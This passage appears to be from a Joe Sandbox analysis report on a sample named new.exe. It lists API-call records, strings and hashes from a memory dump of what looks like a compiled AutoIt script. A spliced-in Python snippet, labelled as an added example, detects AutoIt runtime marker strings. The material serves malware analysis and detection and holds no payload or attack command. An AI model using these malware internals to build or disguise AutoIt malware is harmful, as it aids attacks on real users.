                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                  • API String ID: 1506413516-4153970271
                                                  • Opcode ID: e217a3ccedb96fa687a50f4800a0fa21d99428c4e2bf28e0d9500566ad752184
                                                  • Instruction ID: feb07d4b29631cd2221dbc69cadc20a60c2f77d19293ebab7ebaa74e824b4c59
                                                  • Opcode Fuzzy Hash: e217a3ccedb96fa687a50f4800a0fa21d99428c4e2bf28e0d9500566ad752184
                                                  • Instruction Fuzzy Hash: 13216D3294021AEBCF11EF90CC1AFEE77B9FF19310F0444A9B519660A2EA71A659DB50
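The record above lists the AutoIt3 runtime's script-error formatter (LoadStringW, __swprintf, MessageBoxW) together with the strings ">>>AUTOIT SCRIPT<<<" and 'Line %d (File "%s"):'. Those strings are a quick way to confirm that an unpacked image or memory dump is a compiled AutoIt script before looking for the embedded payload. The following is an added example, not code from the report or from Joe Sandbox: it searches a blob for the runtime strings listed in this report. Assumptions: the strings are searched in UTF-16LE, matching the wide-character APIs the record shows, with ASCII as a fallback; the sample blob is constructed, not taken from new.exe.

```python
# Added example (not part of the Joe Sandbox report): check a PE image or a
# memory dump for AutoIt3 runtime strings that this report's function records
# list. Encoding assumption: UTF-16LE first (the routine uses LoadStringW /
# MessageBoxW), ASCII as a fallback. SAMPLE_DUMP is constructed for the demo.
import re
from typing import Dict, List

# Strings taken from the report's function records (error formatter and the
# registry-root table handled by the CharUpperBuffW routine).
AUTOIT_MARKERS: List[str] = [
    ">>>AUTOIT SCRIPT<<<",
    'Line %d (File "%s"):',
    "Error: ",
    "HKEY_CURRENT_CONFIG",
]


def find_markers(data: bytes) -> Dict[str, List[str]]:
    """Return {marker: [encodings in which it was found]} for each AutoIt marker."""
    hits: Dict[str, List[str]] = {}
    for marker in AUTOIT_MARKERS:
        found = [enc for enc in ("utf-16le", "ascii") if marker.encode(enc) in data]
        if found:
            hits[marker] = found
    return hits


def looks_like_compiled_autoit(data: bytes) -> bool:
    """Heuristic: the script marker and the runtime's error format string together.

    Either string alone can appear in benign tooling; both in one image is the
    interpreter stub that compiled AutoIt scripts ship with.
    """
    hits = find_markers(data)
    return ">>>AUTOIT SCRIPT<<<" in hits and 'Line %d (File "%s"):' in hits


def extract_wide_strings(data: bytes, min_len: int = 8) -> List[str]:
    """Pull printable UTF-16LE strings out of a blob (what `strings -el` does),
    so the rest of the runtime's string table can be reviewed by eye."""
    pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [m.group().decode("utf-16le") for m in pattern.finditer(data)]


# Constructed sample: a fake dump with the markers embedded as UTF-16LE.
SAMPLE_DUMP = (
    b"MZ\x90\x00" + b"\x00" * 32
    + ">>>AUTOIT SCRIPT<<<".encode("utf-16le") + b"\x00\x00"
    + 'Line %d (File "%s"):'.encode("utf-16le") + b"\x00\x00"
    + "HKEY_CURRENT_CONFIG".encode("utf-16le") + b"\x00\x00"
    + b"unrelated ascii padding" * 2
)

if __name__ == "__main__":
    print(find_markers(SAMPLE_DUMP))
    print("compiled AutoIt:", looks_like_compiled_autoit(SAMPLE_DUMP))
    for s in extract_wide_strings(SAMPLE_DUMP):
        print(repr(s))
```

Run it against the process dump the report names (the `.sdmp` file, after download) rather than the packed sample on disk: a packer or crypter hides these strings until the stub is in memory, which is why the report's markers come from a memory dump in the first place.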
                                                  APIs
                                                    • Part of subcall function 00BC7BCC: _memmove.LIBCMT ref: 00BC7C06
                                                    • Part of subcall function 00BC7924: _memmove.LIBCMT ref: 00BC79AD
                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C25330
                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C25346
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C25357
                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C25369
                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C2537A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: SendString$_memmove
                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                  • API String ID: 2279737902-1007645807
                                                  • Opcode ID: 192f2450e5d960b53f70c3dd3de2a1f2deb9b6a13e35a7702aa0e409e879b57c
                                                  • Instruction ID: b0f976067047032b97fdb798ac367901c78e16571a0318b0c49f4d3a4bf14468
                                                  • Opcode Fuzzy Hash: 192f2450e5d960b53f70c3dd3de2a1f2deb9b6a13e35a7702aa0e409e879b57c
                                                  • Instruction Fuzzy Hash: A611BF31AD016979D724F661DC4AEFFBBBCEB91B50F004469B516A20E1EEB01D08C9B0
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                  • String ID: 0.0.0.0
                                                  • API String ID: 208665112-3771769585
                                                  • Opcode ID: 7d9fd508307ebc67eea2128f1a7284923d1669c5aa244a9a877fb3caee16daaa
                                                  • Instruction ID: 797dc7aa3587cf8acfcd7885b2559169492188dc6fdcb4be4575eb191f6f5b12
                                                  • Opcode Fuzzy Hash: 7d9fd508307ebc67eea2128f1a7284923d1669c5aa244a9a877fb3caee16daaa
                                                  • Instruction Fuzzy Hash: D0110635900124AFDB24AB71AC4AFEE77BCEF02B11F0441BAF55996091FF749E82CA50
                                                  APIs
                                                  • timeGetTime.WINMM ref: 00C24F7A
                                                    • Part of subcall function 00BE049F: timeGetTime.WINMM(?,7707B400,00BD0E7B), ref: 00BE04A3
                                                  • Sleep.KERNEL32(0000000A), ref: 00C24FA6
                                                  • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00C24FCA
                                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C24FEC
                                                  • SetActiveWindow.USER32 ref: 00C2500B
                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C25019
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00C25038
                                                  • Sleep.KERNEL32(000000FA), ref: 00C25043
                                                  • IsWindow.USER32 ref: 00C2504F
                                                  • EndDialog.USER32(00000000), ref: 00C25060
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                  • String ID: BUTTON
                                                  • API String ID: 1194449130-3405671355
                                                  • Opcode ID: 91acceedaf86f1c4bf5f5b6737b22bbc928aad48fa6c79bede6b6a98499fe46c
                                                  • Instruction ID: 127d971974dc3b95d39651f703bf9c53e18d67875eb6fda997ee1b9b7a672a33
                                                  • Opcode Fuzzy Hash: 91acceedaf86f1c4bf5f5b6737b22bbc928aad48fa6c79bede6b6a98499fe46c
                                                  • Instruction Fuzzy Hash: B921AF78604615FFE7105FB0FD89B2E3BA9FB4A785F041038F505826B1CBB18E529B66
                                                  APIs
                                                    • Part of subcall function 00BC9837: __itow.LIBCMT ref: 00BC9862
                                                    • Part of subcall function 00BC9837: __swprintf.LIBCMT ref: 00BC98AC
                                                  • CoInitialize.OLE32(00000000), ref: 00C2D5EA
                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C2D67D
                                                  • SHGetDesktopFolder.SHELL32(?), ref: 00C2D691
                                                  • CoCreateInstance.OLE32(00C52D7C,00000000,00000001,00C78C1C,?), ref: 00C2D6DD
                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C2D74C
                                                  • CoTaskMemFree.OLE32(?,?), ref: 00C2D7A4
                                                  • _memset.LIBCMT ref: 00C2D7E1
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00C2D81D
                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C2D840
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00C2D847
                                                  • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00C2D87E
                                                  • CoUninitialize.OLE32(00000001,00000000), ref: 00C2D880
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                  • String ID:
                                                  • API String ID: 1246142700-0
                                                  • Opcode ID: 0d75a902560e47f84c612ee162bf37cf6065e078f2b9e6d16a4348f18bfef27a
                                                  • Instruction ID: 716994c0f0a8e292cbd7e3a089f6dfa910a1e1e1655d853570cf563759d554dc
                                                  • Opcode Fuzzy Hash: 0d75a902560e47f84c612ee162bf37cf6065e078f2b9e6d16a4348f18bfef27a
                                                  • Instruction Fuzzy Hash: F2B10D75A00119AFDB04DF64D888EAEBBF9FF49314B1484A9F91AEB251DB30ED41CB50
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000001), ref: 00C1C283
                                                  • GetWindowRect.USER32(00000000,?), ref: 00C1C295
                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00C1C2F3
                                                  • GetDlgItem.USER32(?,00000002), ref: 00C1C2FE
                                                  • GetWindowRect.USER32(00000000,?), ref: 00C1C310
                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00C1C364
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00C1C372
                                                  • GetWindowRect.USER32(00000000,?), ref: 00C1C383
                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00C1C3C6
                                                  • GetDlgItem.USER32(?,000003EA), ref: 00C1C3D4
                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C1C3F1
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00C1C3FE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                  • String ID:
                                                  • API String ID: 3096461208-0
                                                  • Opcode ID: 74936024901562bb58392c3928487577973053be34e57bedf5d0ce5a6763075e
                                                  • Instruction ID: 653412c6ecde972fd9c1b50cc2292f9450456ad0bec9d671b6a906c1584eece0
                                                  • Opcode Fuzzy Hash: 74936024901562bb58392c3928487577973053be34e57bedf5d0ce5a6763075e
                                                  • Instruction Fuzzy Hash: 73515F75B40205AFDB18CFA9DD89BAEBBBAFB89310F14812DF515D72A0D7709E418B10
                                                  APIs
                                                    • Part of subcall function 00BC1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BC2036,?,00000000,?,?,?,?,00BC16CB,00000000,?), ref: 00BC1B9A
                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00BC20D3
                                                  • KillTimer.USER32(-00000001,?,?,?,?,00BC16CB,00000000,?,?,00BC1AE2,?,?), ref: 00BC216E
                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 00BFBCA6
                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BC16CB,00000000,?,?,00BC1AE2,?,?), ref: 00BFBCD7
                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BC16CB,00000000,?,?,00BC1AE2,?,?), ref: 00BFBCEE
                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BC16CB,00000000,?,?,00BC1AE2,?,?), ref: 00BFBD0A
                                                  • DeleteObject.GDI32(00000000), ref: 00BFBD1C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                  • String ID:
                                                  • API String ID: 641708696-0
                                                  • Opcode ID: 14eb2806efaa236e47bc7145f508519b1c204e51ede235986e89ebfa411be0f3
                                                  • Instruction ID: 549ec5c1443fcc8217e49c975001edf516d3decf1982d17a15c3a64d8b8da877
                                                  • Opcode Fuzzy Hash: 14eb2806efaa236e47bc7145f508519b1c204e51ede235986e89ebfa411be0f3
                                                  • Instruction Fuzzy Hash: F8619C39500A04DFDB359F14C988F2AB7F2FF41312F1484AEE5429B9B0C7B0A895DB95
                                                  APIs
                                                    • Part of subcall function 00BC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00BC25EC
                                                  • GetSysColor.USER32(0000000F), ref: 00BC21D3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ColorLongWindow
                                                  • String ID:
                                                  • API String ID: 259745315-0
                                                  • Opcode ID: 0ad64941ef9104caf63617a271723b67b49dffefa432b6e216953ee5b868f9da
                                                  • Instruction ID: 0c8d1023ad6f2219224914afc9119d8fd66ca966aac59ec50d0b723f2e3c52d9
                                                  • Opcode Fuzzy Hash: 0ad64941ef9104caf63617a271723b67b49dffefa432b6e216953ee5b868f9da
                                                  • Instruction Fuzzy Hash: 5A416F35100544EEDB259F28EC88FBD3BA5EB06331F1942A9FE659E1E5C7718C42DB21
                                                  APIs
                                                  • CharLowerBuffW.USER32(?,?,00C4F910), ref: 00C2A90B
                                                  • GetDriveTypeW.KERNEL32(00000061,00C789A0,00000061), ref: 00C2A9D5
                                                  • _wcscpy.LIBCMT ref: 00C2A9FF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: BuffCharDriveLowerType_wcscpy
                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                  • API String ID: 2820617543-1000479233
                                                  • Opcode ID: cb1034d057650cb89fb1c0dcb6714ba7586f36208d4545d331d178e18f087481
                                                  • Instruction ID: 590692774e71239fad3d05eb922ae04cd237ac2e84c9fa4693ce326f7e3ae560
                                                  • Opcode Fuzzy Hash: cb1034d057650cb89fb1c0dcb6714ba7586f36208d4545d331d178e18f087481
                                                  • Instruction Fuzzy Hash: 2851CB31118311ABC700EF16D892BAFB7E5FF94700F1048ADF5A6572A2DB70DA89CA53
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: __i64tow__itow__swprintf
                                                  • String ID: %.15g$0x%p$False$True
                                                  • API String ID: 421087845-2263619337
                                                  • Opcode ID: 51190fb160a3170045eafd4aa0da67cec596590b781e8fcb9a9180f935d17526
                                                  • Instruction ID: 556c9cea673eae967d0c5e1b90fc240118808a923ddac70fa9541b1d8134799d
                                                  • Opcode Fuzzy Hash: 51190fb160a3170045eafd4aa0da67cec596590b781e8fcb9a9180f935d17526
                                                  • Instruction Fuzzy Hash: FC41E47151420AAFEB24EF35DC8AF7A73E8EF05340F2044FEE649D7291EA7199458B11
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C4716A
                                                  • CreateMenu.USER32 ref: 00C47185
                                                  • SetMenu.USER32(?,00000000), ref: 00C47194
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C47221
                                                  • IsMenu.USER32(?), ref: 00C47237
                                                  • CreatePopupMenu.USER32 ref: 00C47241
                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C4726E
                                                  • DrawMenuBar.USER32 ref: 00C47276
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                  • String ID: 0$F
                                                  • API String ID: 176399719-3044882817
                                                  • Opcode ID: 439ef02257645a166ad4a6d922b4ed487ddb1f4af41e8bdf3376b8135a5f247b
                                                  • Instruction ID: 4bc54e966e412470a8768cb2fa9cc26274fe9b273a9086783dffaecce47be913
                                                  • Opcode Fuzzy Hash: 439ef02257645a166ad4a6d922b4ed487ddb1f4af41e8bdf3376b8135a5f247b
                                                  • Instruction Fuzzy Hash: C6416578A01209EFDB20DFA4D884F9ABBF5FF09310F144629F915A7361D771AA10CBA0
                                                  APIs
                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00C4755E
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00C47565
                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00C47578
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00C47580
                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00C4758B
                                                  • DeleteDC.GDI32(00000000), ref: 00C47594
                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00C4759E
                                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00C475B2
                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00C475BE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                  • String ID: static
                                                  • API String ID: 2559357485-2160076837
                                                  • Opcode ID: f73df3956c69630d9efd9215a484914692fde0f1b94df0b532536d80eafbbe48
                                                  • Instruction ID: bdf84dee7af324381f3ac1a7e4637fea17ab6df0de0eaa4b708cd0328fe1fb2c
                                                  • Opcode Fuzzy Hash: f73df3956c69630d9efd9215a484914692fde0f1b94df0b532536d80eafbbe48
                                                  • Instruction Fuzzy Hash: A9314936105214ABDF119F64DC08FEA3B69FF0A360F110229FA25A60A0C731D912DBA4
                                                  APIs
                                                  • _memset.LIBCMT ref: 00BE6E3E
                                                    • Part of subcall function 00BE8B28: __getptd_noexit.LIBCMT ref: 00BE8B28
                                                  • __gmtime64_s.LIBCMT ref: 00BE6ED7
                                                  • __gmtime64_s.LIBCMT ref: 00BE6F0D
                                                  • __gmtime64_s.LIBCMT ref: 00BE6F2A
                                                  • __allrem.LIBCMT ref: 00BE6F80
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BE6F9C
                                                  • __allrem.LIBCMT ref: 00BE6FB3
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BE6FD1
                                                  • __allrem.LIBCMT ref: 00BE6FE8
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BE7006
                                                  • __invoke_watson.LIBCMT ref: 00BE7077
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                  • String ID:
                                                  • API String ID: 384356119-0
                                                  • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                  • Instruction ID: ff2be9caf160186f6ce8a7490d728cbdd6b7249022c229e29fcd2b47229f1b30
                                                  • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                  • Instruction Fuzzy Hash: 29711876A40757ABD714AE6ADC81B6AB3E8EF14760F1082B9F514E72C2EB70DD0487D0
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C22542
                                                  • GetMenuItemInfoW.USER32(00C85890,000000FF,00000000,00000030), ref: 00C225A3
                                                  • SetMenuItemInfoW.USER32(00C85890,00000004,00000000,00000030), ref: 00C225D9
                                                  • Sleep.KERNEL32(000001F4), ref: 00C225EB
                                                  • GetMenuItemCount.USER32(?), ref: 00C2262F
                                                  • GetMenuItemID.USER32(?,00000000), ref: 00C2264B
                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00C22675
                                                  • GetMenuItemID.USER32(?,?), ref: 00C226BA
                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C22700
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C22714
                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C22735
